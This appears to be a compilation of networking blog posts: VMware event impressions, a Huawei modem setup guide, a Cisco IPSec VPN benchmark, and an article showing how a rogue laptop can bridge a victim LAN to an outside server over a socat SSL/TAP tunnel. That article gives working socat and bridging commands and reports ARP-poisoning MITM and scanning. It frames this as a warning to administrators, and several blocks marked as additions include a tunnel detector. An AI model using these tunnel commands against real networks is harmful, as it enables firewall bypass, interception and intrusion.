Few Words on VMware Evolve 2014

On 28th May 2014 the guys from VMware organised the Evolve 2014 event in Bucharest. Partners such as HP, Cisco, Dell and Veeam were also invited to speak about their future plans. I'll write down a few ideas about what I saw there:

  • VMware is riding the wave. They really know what customers expect from virtualization, and I am talking about NSX. However, the release of NSX will seriously hit the sales of networking vendors.
  • VMware's presentations were A++. All the speakers from VMware presented interesting topics and included technical details to keep the audience interested, unlike the guys from Cisco Connect last year with their too-much-business approach…
  • Partners, partners… or not? The speaker from VMware was joking about HP servers made in China while the speaker from HP was preparing to take the microphone. Not nice.
  • It was amusing to see a business woman trying to convince us that everything can and should be virtualized. Yeah, sure.
  • Networking vendors are somewhat against the trend. Cisco is neglecting OpenFlow and trying hard to make you buy your full infrastructure from them, including servers. At a moment when most other vendors provide interoperability and open-standard solutions, that might not be a good idea. Also, the trend of moving advanced functions from switches and routers to the servers will certainly hit networking companies.

However, when you check VMware's price list you realize that KVM is still a great solution. I used them both and I still prefer KVM for its transparent, Linux-style implementation and the ease of troubleshooting.
Network Intrusion using Socat SSL Tunnel

Introduction

This article presents a scenario describing what can happen when an untrusted device is connected to a network. Although the article uses a so-called rogue laptop to access the network, that device could just as well be a computer running malware.

The scenario is simple: someone requests access to your network for a common reason: he wants to send an e-mail, check his Facebook news feed or something similar. If you kindly allow him to connect to your network, you had better connect him directly into an untrusted segment of your infrastructure, because this new untrusted device can do a lot of bad things!

In this article we present a simple "bad thing" that can be done with a single line of scripting. An attacker can use a tool like socat to create an SSL tunnel and forward traffic over a TCP connection initiated from within the network. If the socat tunnel is bound to a Linux TAP interface, Layer 2 traffic can be forwarded over the TCP connection. This means that an attacker creating the tunnel can bring an outside host right into your local network, completely bypassing your firewall rules. Moreover, the attacker can run vulnerability assessment software like Nessus to scan your network, identify vulnerabilities and possibly exploit them. If the firewall is not performing SSL inspection in proxy mode, it has absolutely no chance of intercepting the encrypted forwarded traffic.
How to

The picture of the attack is presented below:

Attack Topology

The server is reachable from the Internet and runs a simple daemonized socat like the following:

socat TUN:10.0.0.1/24,tun-name=tap0,tun-type=tap,iff-up,iff-broadcast OPENSSL-LISTEN:5544,certificate=server.pem,cafile=ca.crt

The address 10.0.0.1/24 is only used temporarily. Once the client connects from the remote laptop, a dhclient request is performed to obtain an address inside the victim's network.

The client should simply run the following command:

socat OPENSSL:server.bluedrive.ro:5544,cafile=ca.crt TUN:10.0.0.2/24,tun-name=tap1,tun-type=tap,iff-up,iff-broadcast &

Once the client interface is connected, the newly created TAP should be bridged with the remote network. It is possible to create a bridge and then insert the TAP into the bridge (on the rogue laptop):

brctl addbr br0
brctl addif br0 tap1
brctl addif br0 eth0

Once this is done, the server can perform a DHCP request using dhclient (on the server):

dhclient tap0

And that is all. With Layer 2 connectivity into a remote network it is possible to perform devastating attacks. I was able to perform MITM using arp poisoning, for example. Another attack is to use a vulnerability assessment tool like Nessus to discover the computers from the remote network. Nmap discovery can be successfully performed also.

From the network admin's point of view, it is important to note that there is a good chance such attacks will go unnoticed. The firewall won't detect what's inside the SSL tunnel if it is not using proxy inspection. Even if it can intercept the SSL traffic, security devices might not correctly interpret the Ethernet-over-TCP traffic.
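One flow-level check a defender can run without SSL inspection, as an added example that is not part of the original article: a TAP-over-OPENSSL tunnel like the one above is a single TCP session that stays up for hours and carries Layer 2 traffic in both directions, so it stands out in flow logs even though its payload is opaque. The flow records, field names and thresholds below are constructed assumptions.

```python
"""Flag flows shaped like a long-lived encrypted tunnel to a non-web port.

Added example, not from the article: the payload is opaque, but the session
length, the port and the byte symmetry are still visible in flow logs."""

# Constructed flow records (not real captures), one per line:
# ts src dst dport service duration_s orig_bytes resp_bytes
SAMPLE_FLOWS = """\
1401264000 192.168.1.23 203.0.113.80 443 ssl 12 4231 88021
1401264010 192.168.1.23 198.51.100.5 5544 ssl 5400 48211233 51002119
1401264020 192.168.1.40 192.168.1.1 53 dns 0 72 160
1401264030 192.168.1.23 198.51.100.5 5544 ssl 35 1200 3400
1401264040 192.168.1.51 203.0.113.9 993 ssl 1800 220000 9500000
"""

EXPECTED_TLS_PORTS = {443, 465, 993, 995}  # web, SMTPS, IMAPS, POP3S
MIN_DURATION_S = 600   # a tunnel stays up; ordinary TLS requests do not
MIN_SYMMETRY = 0.25    # min/max of bytes each way; clients mostly download

FIELDS = ("ts", "src", "dst", "dport", "service", "duration", "orig_bytes", "resp_bytes")
INT_FIELDS = ("ts", "dport", "duration", "orig_bytes", "resp_bytes")


def parse_flows(text):
    """Parse whitespace-separated flow lines into dicts with int fields."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            rec = dict(zip(FIELDS, line.split()))
            for key in INT_FIELDS:
                rec[key] = int(rec[key])
            flows.append(rec)
    return flows


def is_tunnel_like(flow):
    """True for a TLS flow that is long-lived, on an unexpected port and roughly symmetric."""
    if flow["service"] != "ssl" or flow["dport"] in EXPECTED_TLS_PORTS:
        return False
    if flow["duration"] < MIN_DURATION_S:
        return False
    hi = max(flow["orig_bytes"], flow["resp_bytes"])
    lo = min(flow["orig_bytes"], flow["resp_bytes"])
    return hi > 0 and lo / hi >= MIN_SYMMETRY


def find_tunnels(text):
    """Return (src, dst, dport) for every flow matching the heuristic."""
    return [(f["src"], f["dst"], f["dport"]) for f in parse_flows(text) if is_tunnel_like(f)]


if __name__ == "__main__":
    for src, dst, dport in find_tunnels(SAMPLE_FLOWS):
        print(f"possible encrypted tunnel: {src} -> {dst}:{dport}")
```

Only the hours-long, balanced session to port 5544 is reported; the short session to the same host and the IMAPS download are not.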

Conclusions

Network administrators should carefully plan how new computers access the network. They should also consider that even trusted computers can perform malicious tasks, and implement intrusion detection mechanisms and advanced packet inspection. Also, make sure that your firewall can intercept and inspect SSL traffic (regardless of the destination port used).
Article dedicated to S. T. To my S. T. <3.

Ubuntu 12.04 support for Huawei E392

One of the best 4G/LTE modems available on the market doesn't work with Ubuntu 12.04 with the default settings, even though it is supported by the supplied kernel. The problem resides in the usb_modeswitch tool, which lacks the configuration for switching the device from USB storage mode to 4G modem mode.

The problem

USB modem sticks act like storage devices once connected to a computer. This is the default behaviour because you usually plug the modem into your Windows machine and install an application provided by your data carrier. This application is responsible for switching the modem from storage device to 4G/3G modem mode. However, most of the time the carrier supplies only a Windows version of its app, and you will have to deal on your own with the problems that arise from connecting the device to a Linux-powered computer.

But Ubuntu and other distros are prepared for this (unlike the default drivers on Windows systems). There is an application called usb_modeswitch which detects the modem and switches its mode from USB storage device to data modem. This is done by sending a specific set of bytes to the device over USB. Once this is done, you will get one or two /dev/ttyUSBX entries in the /dev folder and the Broadband Connections widget will handle the PPP connection (with minimal settings supplied by the user).

Solution for Huawei E392

I recently got a new unlocked Huawei E392u-12 and I wanted to connect my laptop to the internet using it. However, once I plugged it into the USB port, all I could do was to browse the contents of the stick.

After some Google research, I understood that the device is not automatically switched to USB 4G modem mode. I had to use the usb_modeswitch tool to switch it manually (as root):

usb_modeswitch -v 12d1 -p 151a -V 12d1 -P 151b -W -M "55534243123456780000000000000011062000000100000000000000000000"

The -V and -P options can be omitted if you are trying to switch another modem from Huawei. The message content should work for most Huawei sticks.
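To see what the "specific set of bytes" in that message actually is, here is an added decoder that is not part of the original post: the message is a 31-byte USB mass-storage Command Block Wrapper (CBW) carrying a vendor-specific SCSI command, which is why a stick still in storage mode accepts it. The field layout follows the USB Mass Storage Bulk-Only Transport specification; the output labels are my own.

```python
"""Decode a usb_modeswitch MessageContent as a USB mass-storage Command Block
Wrapper (CBW). Added example, not from the article."""
import struct

# MessageContent from the article's usb_modeswitch config for the E392u-12
HUAWEI_E392_MESSAGE = "55534243123456780000000000000011062000000100000000000000000000"

# Bulk-Only Transport CBW: 15-byte little-endian header + 16-byte command block
CBW_HEADER = struct.Struct("<4s4sIBBB")


def decode_cbw(hex_message):
    """Return the CBW fields of a 31-byte modeswitch message; raise on malformed input."""
    raw = bytes.fromhex(hex_message.strip())
    if len(raw) != 31:
        raise ValueError(f"CBW must be 31 bytes, got {len(raw)}")
    sig, tag, data_len, flags, lun, cb_len = CBW_HEADER.unpack(raw[:15])
    if sig != b"USBC":
        raise ValueError(f"bad signature {sig!r}, expected b'USBC'")
    cb = raw[15:]
    return {
        "signature": sig.decode("ascii"),
        "tag": tag.hex(),                  # echoed back by the device in its status wrapper
        "data_len": data_len,              # 0: command only, no data phase follows
        "direction": "IN" if flags & 0x80 else "OUT",
        "lun": lun & 0x0F,
        "cb_len": cb_len,                  # declared command length (0 in this message)
        "opcode": cb[0],                   # first CB byte: SCSI opcode, 0x11 is vendor-specific
        "cb": cb.hex(),
    }


if __name__ == "__main__":
    for key, value in decode_cbw(HUAWEI_E392_MESSAGE).items():
        print(f"{key:10} {value}")
```

The decoded message has no data phase and its command block starts with 0x11 0x06 0x20 0x00 0x00 0x01, the part that differs between Huawei models when a stick needs a different MessageContent.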

Once this is done, you should see a device with 12d1:151b vendor/device IDs in the output of lsusb.

After that, just use the Network Manager and set up your Broadband Connection.

To have the system do all of this automatically once the USB stick is plugged in, create the /etc/usb_modeswitch.d/12d1\:151a file with the following content:

usb_modeswitch configuration for Huawei E392

If you need to copy paste it:

# Huawei E392u-12
TargetVendor=  0x12d1
TargetProduct= 0x151b
MessageContent="55534243123456780000000000000011062000000100000000000000000000"

You should also edit the /lib/udev/rules.d/40-usb_modeswitch.rules file and add the following content after the LABEL="modeswitch_rules_begin" line:

# Huawei E392u-12
ATTRS{idVendor}=="12d1", ATTRS{idProduct}=="151a", RUN+="usb_modeswitch '%b/%k'"

Udev Rule

From this point on, your modem should be automatically recognized as a 4G Modem once you plug it in the USB port.

Note that the solution presented here can be adapted for other Huawei modems also. Just test switching using the usb_modeswitch tool. Also report new results to http://www.draisberghof.de/usb_modeswitch/ .
Site to Site VPN with Cisco 3825 & Cisco 2821 Routers

I recently got two Cisco routers from Germany and I wanted to perform some tests and check the performance of the devices. One of the first things that I spotted on the output of “show version” was the fact that both devices had an integrated VPN module, thus providing hardware encryption acceleration. With that in mind, I wanted to implement a Site-to-Site IPSec-based VPN and evaluate the solution.

Cisco 3825 & 2821 Routers

Scenario

Company X has two offices connected to the Internet. However, they don't want to invest in a dedicated link to interconnect the sites and prefer to use the existing Internet connections to create a secure tunnel. The tunnel will connect the two sites, and employees will be able to access computers from the other site(s) the same way they access their local servers. Thus file sharing, collaborative work and cooperation between the sites will be simpler than ever, but more importantly, the link between the two sites will be encrypted for privacy.

Solution

Considering that you already have two sites with two Internet connections, not much needs to change. Use two routers capable of creating and working with IPSec tunnels and you are good to go. This document uses two Cisco routers and Virtual Tunnel Interfaces (VTIs) for the IPSec tunnel link. Why use the VTI approach instead of the standard crypto map applied on an interface? The advantages are listed below:

  • easier management – for example, to select the traffic that should pass through the tunnel, just route it through that interface
  • scalability – fewer Security Associations are needed for the traffic passing through the tunnel
  • dynamic routing – as the VTI is a Layer 3 routable interface, it can be used with dynamic routing protocols
  • loopbacks can be used as the tunnel source/destination, improving availability if the sites use redundant Internet connections
  • better performance (see the tests below)
Hardware

As already mentioned, I used two Cisco routers for my setup. The more important office (the one that should support more VPN tunnels) should use the Cisco 3825 router.

The main characteristics are:

  • 2 Gigabit Ethernet (1000 Mbps) interfaces
  • 2 Fast Ethernet (100 Mbps) interfaces
  • 512 MB RAM
  • VPN card

Show version output:

Master#show version
Cisco IOS Software, 3800 Software (C3825-ADVENTERPRISEK9-M), Version 12.4(12), RELEASE SOFTW)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Fri 17-Nov-06 15:31 by prod_rel_team

ROM: System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)

Master uptime is 1 hour, 16 minutes
System returned to ROM by power-on
System image file is "flash:c3825-adventerprisek9-mz.124-12.bin"

Cisco 3825 (revision 1.2) with 485376K/38912K bytes of memory.

Processor board ID FHK1132F066
2 FastEthernet interfaces
2 Gigabit Ethernet interfaces
1 Virtual Private Network (VPN) Module
DRAM configuration is 64 bits wide with parity enabled.
479K bytes of NVRAM.
62720K bytes of ATA System CompactFlash (Read/Write)

Configuration register is 0x2102

Considering Cisco’s Datasheet, the 3825 should provide around 170 Mbps IPSec Throughput (3DES/AES encryption).

The other router used was a Cisco 2821, less powerful than the 3825 but just perfect for routing packets to the Internet for a small office. The specs are:

  • 2 Gigabit Ethernet (1000 Mbps) interfaces
  • 512 MB RAM
  • VPN card

Show version output:

Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 12.4(12), RELEASE SOF)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Fri 17-Nov-06 12:02 by prod_rel_team

ROM: System Bootstrap, Version 12.4(13r)T11, RELEASE SOFTWARE (fc1)

Slave uptime is 1 hour, 18 minutes
System returned to ROM by power-on
System image file is "flash:c2800nm-adventerprisek9-mz.124-12.bin"

….

Cisco 2821 (revision 53.50) with 509952K/14336K bytes of memory.
Processor board ID FCZ1409708Y
2 Gigabit Ethernet interfaces
1 Virtual Private Network (VPN) Module
DRAM configuration is 64 bits wide with parity enabled.
239K bytes of non-volatile configuration memory.
126000K bytes of ATA CompactFlash (Read/Write)

Configuration register is 0x2102

According to the Datasheet, the 2821 should be able to route 56 Mbps of IPSec traffic.

For traffic tests I used one server with Gigabit LAN card and one Laptop with Gigabit link also.
Setup and configuration

The topology of the network is presented below:

Network Topology
The two sites considered use private IP addressing and each has one Internet connection with a public IP address assigned on the Gigabit0/1 interface. This is a standard setup for many companies that do not use public IP addressing inside the company. Note that the security benefits of the IPSec tunnel still apply in this case.
When using VTI, a tunnel interface is created. Each end of the tunnel uses an IP address, and once the configuration is in place it should be possible to ping the remote end of the tunnel from one router for testing purposes. Another important detail is how to choose the source and destination addresses of the tunnel: the source should be the local public IP address, while the destination should be the remote public IP address. As simple as that. In fact, those IP addresses will be carried by the encrypted packets while they travel through the Internet.
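The VTI configuration this paragraph describes, as an added example written for this article and not the author's actual router configuration. The addressing is an assumption: the 3825 side has public address 88.0.0.1 on Gigabit0/1 and LAN 10.1.0.0/24, the 2821 side has 88.0.0.2 and LAN 10.2.0.0/24, the tunnel itself uses 172.16.0.0/30, and the pre-shared key is a placeholder; the remote router mirrors the same lines with the addresses swapped.

```cisco
! Cisco 3825 side (assumed addressing, see lead-in)
crypto isakmp policy 10
 encryption aes 256
 hash sha
 authentication pre-share
 group 5
! use a larger DH group where the IOS release supports it
crypto isakmp key REPLACE-WITH-STRONG-PSK address 88.0.0.2
!
crypto ipsec transform-set VTI-TS esp-aes 256 esp-sha-hmac
 mode tunnel
!
crypto ipsec profile VTI-PROFILE
 set transform-set VTI-TS
!
interface Tunnel0
 ip address 172.16.0.1 255.255.255.252
 tunnel source GigabitEthernet0/1
 tunnel destination 88.0.0.2
 tunnel mode ipsec ipv4
 tunnel protection ipsec profile VTI-PROFILE
!
! Selecting traffic is just routing: send the remote LAN into the tunnel,
! no crypto map or interesting-traffic ACL is needed
ip route 10.2.0.0 255.255.255.0 Tunnel0
```

After both sides are up, "show crypto ipsec sa" and a ping to 172.16.0.2 from the 3825 confirm the tunnel end-to-end, as the paragraph suggests.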
Results

The first thing I did was to test the bandwidth between the server and the client with iperf, without enabling the site to site vpn, so without any tunnel between the networks.

Standard Routing, no IPSec
The results of the test were much better than I expected (the 2821 performed really well). A bandwidth of over 875 Mbps would provide very good Internet access, and with such high values I think both routers could be used for almost wire-speed routing in enterprise networks.

With the site-to-site VPN enabled, the throughput is higher than the Internet bandwidth that many small and medium companies use. 46.8 Mbps of IPSec traffic is not an amazing value (in fact it is lower than the one in the 2821's datasheet), but it is more than enough for most business applications.
IPSec Tunnel Results

I wanted to see if using crypto maps provided improved performance, but the results show that implementing VTIs is the best option.

IPSec using Crypto Maps

It doesn't make sense to waste almost 3 Mbps of encrypted throughput, so stick to VTIs with all the other advantages presented.

Another test was to download a 4GB ISO from the Web Server hosted on the Server machine to the Client, using wget.

HTTP over IPSec (3des encryption)

The Goodput traffic represents about 42.5 Mbps.

Note that the performance does not change even if the encryption algorithm is changed to AES or plain DES.
HTTP over IPSec (des encryption)

I was also curious about the pure routing throughput of both routers, so I wanted to check the bandwidth from both the 10.1.0.0/24 and 10.2.0.0/24 networks to the 88.0.0.0/24 network. I moved the server into the "public" subnet and used iperf again.
Cisco 3825 routing throughput

Cisco 2821 routing throughput

Both routers can push over 900 Mbps between the two Gigabit interfaces available, which is quite impressive for access layer routers. Add the over 45 Mbps of IPSec throughput and I consider them a good deal.
Conclusions

With a throughput of over 45 Mbps of IPSec data, I consider the solution presented flexible, efficient and cost-effective for a small or medium size company interested in connecting two sites. Moreover, the Cisco 3825 router is more than capable of supporting up to 3 tunnels, so it could be a serious hub for a hub-and-spoke topology. 45 Mbps of IPSec traffic is quite enough for most medium size companies, especially if the Internet connection of the offices involved offers a bandwidth of less than 100 Mbps. In that case, investing in more expensive equipment would make no sense. Even if considered access level routers, both Cisco devices presented here can route almost 1 Gbit of traffic, a serious value which indicates that they are capable of being an active part of Gigabit networks.
The solution presented here can be offered to customers as a full package: equipment and support are included. The Cisco routers are available for sale separately or can be part of a larger technical solution. For more details regarding services and prices, contact me at alexandru.bujor@bluedrive.ro . Expect considerably lower costs compared to ordering new equipment, as our devices are refurbished by Esphere Networks and come with a limited warranty.